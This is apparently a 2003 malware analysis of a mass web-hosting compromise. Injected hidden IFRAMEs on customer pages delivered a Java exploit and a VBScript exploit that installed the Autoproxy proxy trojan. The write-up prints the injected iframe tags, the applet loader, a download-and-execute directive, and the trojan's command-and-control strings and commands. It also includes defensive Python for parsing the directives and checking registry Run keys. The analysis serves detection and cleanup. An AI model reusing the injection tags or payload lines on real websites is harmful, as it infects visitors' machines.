Internet Explorer/Autoproxy Trojan Analysis

Sometime around the 28th of August 2003, a major webhosting provider's Windows-based hosting systems were compromised and hostile code was inserted into each customer's pages in an IFRAME tag. The actual tag that was added was:

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

This loaded the following content into a 0x0 IFRAME:

<IFRAME SRC="http://selfbookmark.com/enter.cgi?id=742" WIDTH=1 HEIGHT=1></IFRAME>
<object data="http://ww.beech-info2.com/cgi-bin/inf2.pl"></object>

The selfbookmark.com IFRAME then loaded the following content:

<HTML><HEAD><script language=JavaScript>a=setInterval("window.status=' '",1)</script></HEAD><BODY onLoad="clearInterval(a)"><APPLET CODE="BlackBox.class" ARCHIVE="archived.jar" WIDTH=1 HEIGHT=1><PARAM NAME=data VALUE="lst"><PARAM NAME=time VALUE=1056204506><IFRAME SRC="/enter.cgi?ie=1&id=742" WIDTH=1 HEIGHT=1></IFRAME></APPLET></BODY></HTML>

This is a hostile java applet that is detected by anti-virus scanners as JAVA_Bytverify.A, code which takes advantage of the MS03-011 vulnerability announced on April 9, 2003. Visitors with a vulnerable Microsoft Java VM would have fallen prey to this code.

The Java applet downloads a text file from http://www.clavus.net/lst.backs that contains the following directives:

SP|www.ewebsearch.net/sp.htm
HP|www.ewebsearch.net/|no
HomeSet|ya
TYPED|ewebsearch.net
TYPED|hunteros.com
TYPED|sexhits.org
TYPED|www.ewebsearch.net
TYPED|www.hunteros.com
TYPED|www.sexhits.org
bookmark|60pictures.com/|60 pictures every hour
bookmark|sexhits.org/|Quality Adult Top 100
bookmark|sexyteenclub.com/|Sexy Teen Club
bookmark|www.ewebsearch.net/|Ultimate start page
bookmark|www.hunteros.com/|World's first adult search engine
bookmark|young-hardcore.net/|Youngest girls every day
bookmark|young69.net/?id=bm|Youngest 69 galleries
exe|http://www.clavus.net/files/lsd.exe|C:\lsd.exe
scin|http://81.9.1.51/kern.cgi|WININET.DLL|

The URL prefixed with SP would be set to the user's new search page. The "HP" url would become their home page. The "TYPED" URLs would show up in their pulldown history, and the "bookmark" URLs would be added to their bookmarks. The "exe" URL would be downloaded and executed - this may be a porn dialer or some other trojan (it was no longer there at the time of this writing). The "scin" keyword may be a typo; there is nothing in the java applet which utilizes that command.
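As an added example (not SecureWorks' code nor the applet's), here is a small parser for the directive format above that buckets each line by the browser change it would make and lists the remote addresses it references; the sample lines are constructed with placeholder domains rather than the ones in the real file.

```python
from typing import Dict, List

# Constructed sample in the lst.backs layout (placeholder domains, not the real ones).
SAMPLE_DIRECTIVES = """\
SP|www.example-search.invalid/sp.htm
HP|www.example-search.invalid/|no
HomeSet|ya
TYPED|example-search.invalid
TYPED|www.example-search.invalid
bookmark|www.example-search.invalid/|Ultimate start page
exe|http://files.example.invalid/dropper.exe|C:\\dropper.exe
scin|http://192.0.2.10/kern.cgi|WININET.DLL|
"""

# keyword -> (result bucket, number of fields the directive carries)
DIRECTIVES = {
    "SP": ("search_page", 1),
    "HP": ("home_page", 2),        # url, plus a trailing flag ("no") the write-up does not explain
    "HomeSet": ("flags", 1),
    "TYPED": ("typed_urls", 1),
    "bookmark": ("bookmarks", 2),  # url, bookmark title
    "exe": ("executables", 2),     # download url, local path it is saved to and run from
}

def parse_directives(text: str) -> Dict[str, list]:
    """Split each line on '|' and bucket it by keyword; unknown keywords
    (such as 'scin', which the applet never acts on) are kept for review."""
    result: Dict[str, list] = {bucket: [] for bucket, _ in DIRECTIVES.values()}
    result["unknown"] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, *fields = line.split("|")
        if key in DIRECTIVES and len(fields) >= DIRECTIVES[key][1]:
            bucket, n = DIRECTIVES[key]
            result[bucket].append(tuple(fields[:n]) if n > 1 else fields[0])
        else:
            result["unknown"].append(line)
    return result

def remote_indicators(parsed: Dict[str, list]) -> List[str]:
    """Every remote URL or host the directives reference, for blocking or hunting."""
    urls = parsed["search_page"] + parsed["typed_urls"]
    urls += [entry[0] for entry in parsed["home_page"] + parsed["bookmarks"] + parsed["executables"]]
    return sorted(set(urls))
```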

These are obvious, low-grade browser hacks, very different from the more sophisticated trojan being installed via the object tag.

The object data tag loaded and ran a malicious Visual Basic script downloaded from beech-info2.com in the visitor's browser if they were vulnerable to the MS03-032 vulnerability announced only one week prior.

When this script ran, it extracted from its code a Windows executable file 5120 bytes in size, packed with UPX. This file is a downloader called Autoinit. Its job is to download and install a single program from a URL encrypted inside the code section. In this case, the decrypted content was:

GET /bin/ap216.exe HTTP/1.1
Host: smart2com.net

ap216.exe was downloaded and executed on all the vulnerable hosts. This file is a trojan called "Autoproxy", which gives an attacker the ability to bounce his/her TCP connections through infected hosts, disguising the true source of the connection. It also gives the hacker the ability to download other files to the victim's computer and execute system commands.

Autoproxy relies on a "master server" to retrieve commands from. The address of the master server is encrypted inside the code section. In this case, the decrypted content was:

http +smart2com.net -rRL+AHPIiu 18000000 1800000 /bn/ap.txt?\E\T\E

This is a command string for the proxy which causes it to connect to smart2com.net with the given options, and request the file /bin/ap.txt, appending the local system's date and time.

Autoproxy is more sophisticated than most proxy trojans. It has a very flexible control mechanism based on a custom protocol that runs over HTTP. It allows the hacker to have control over the timing of every function the proxy performs. For example, when the ap.txt file is requested, the master server returns the following content:

http +www.cnet.com +ABc "socks 0.0.0.0:0\; httpp 0.0.0.0:0\; http +66.98.150.9
-rRL+HAPIiub 600000 900000 /cgi-bin/post.fcgi \"locip 66.98.150.9\\\; http 
66.98.150.9 +p ap=\\\\A&id=\\\\E\\\\I\\\\E&os=\\\\E\\\\O\\\\E&country=\\\\E
\\\\c\\\\E&lang=\\\\E\\\\l\\\\E&time=\\\\E\\\\T\\\\E&locip=\\\\E\\\\L\\\\E
&bytes=\\\\B&delta=\\\\D&socks=\\\\S&httpp=\\\\H&modem=\\\\m&mouse=\\\\M
&keyboard=\\\\K\""

This instructs the Autoproxy process to get www.cnet.com via HTTP, to start up a socks proxy on a system-chosen port between 1024-5000, to start up an HTTP proxy on a system-chosen port between 1024-5000, and report system information in the specified format back to the master server.

Upon sending back the system information, the Autoproxy process would receive further commands from the master server. Possible commands include:

ADMIN
CLRLOG
ECHO
EXEC
EXIT
FLUSHLOG
HTTP
HTTPP
LOCIP
MESSAGES
RASTEST
RELAY
RESTART
SET
SETID
SOCKS
UNINSTALL
URL
WND

Autoproxy is mistakenly identified by some anti-virus engines as the IRC-based trojan "Backdoor.Coreflood". This is because the two files share a lot of common code, and are probably by the same author. Autoproxy, however, does not use IRC as a control channel, and is not designed for the purposes of denial-of-service attacks.

This is the largest example of mass-hacking to install trojans we have seen to date. It is unclear exactly how many people were affected, but it could easily surpass the number infected with Sobig.F. We believe that this method of spreading trojans will only increase in popularity with the hacking community, since when combined with a mass webserver hack it can leverage far more victims than more well-known propagation routes such as email and p2p networks. Users can no longer safely believe that since they have a firewall and they don't click on email attachments that they will not be infected with a trojan. In the case of the users affected by this trojan, they simply visited a familiar website with a week-out-of-date web browser.

How to tell if you are infected:

Open the start menu, go to "Run" and type "regedit" and click OK. Open the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and look for the following entry:

	Winsock2 driver		EXPLORER.EXE

Also there will be one or two entries with a seven-letter random name for the key and an executable file with the same random name in the System32 directory, for example, something like:

	sbdsjrj			C:\WINNT\System32\sbdsjrj.exe

or

	xdinlte			C:\WINDOWS\System32\xdinlte.exe

It will be different each time, so there is no way to predict what the actual names will be. The key factor is that the executable name will be the keyname with .exe appended.
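An added example, not part of the original write-up: the same two Run-key checks expressed in Python and applied to a constructed list of (name, value) pairs, so the logic can also be run over an exported registry listing. The helper `read_run_key` (added here, not from the page) enumerates the live key only where the `winreg` module exists, i.e. on Windows.

```python
import ntpath
import re
from typing import Iterable, List, Tuple
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample: two entries matching the write-up's patterns plus two benign ones.
SAMPLE_RUN_ENTRIES = [
    ("Winsock2 driver", "EXPLORER.EXE"),
    ("sbdsjrj", r"C:\WINNT\System32\sbdsjrj.exe"),
    ("SoundMAX", r"C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe"),
    ("ctfmon", r"C:\WINDOWS\System32\ctfmon.exe"),
]

def is_autoproxy_entry(name: str, value: str) -> bool:
    """True for the 'Winsock2 driver' = EXPLORER.EXE entry, or for a seven-letter
    random name whose value is ...\\System32\\<name>.exe, as the write-up describes."""
    if name.lower() == "winsock2 driver" and value.strip().lower() == "explorer.exe":
        return True
    if not re.fullmatch(r"[a-z]{7}", name.lower()):
        return False
    path = value.strip().strip('"')
    directory, filename = ntpath.split(path)
    return (filename.lower() == f"{name.lower()}.exe"
            and ntpath.basename(directory).lower() == "system32")

def find_suspicious(entries: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    return [(n, v) for n, v in entries if is_autoproxy_entry(n, v)]

def read_run_key() -> List[Tuple[str, str]]:
    """Enumerate HKLM\\...\\Run on Windows; returns [] where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return []
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:   # no more values under the key
                break
            entries.append((name, str(value)))
            i += 1
    return entries

if __name__ == "__main__":
    for name, value in find_suspicious(read_run_key() or SAMPLE_RUN_ENTRIES):
        print(f"suspicious Run entry: {name!r} -> {value}")
```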

Manual Removal:

Warning: Do not attempt this unless you are comfortable editing your registry. Making a mistake here could cause registry corruption or failure to boot. If in doubt about which files are malicious, do not follow this procedure; instead get an anti-virus scanner and let it quarantine the files.

Open the task manager by pressing CTRL-ALT-DELETE. Find the explorer.exe process from the list and kill it. The taskbar should momentarily disappear and return. This will remove the trojans from the Explorer memory space. Then delete the registry entries you found above.
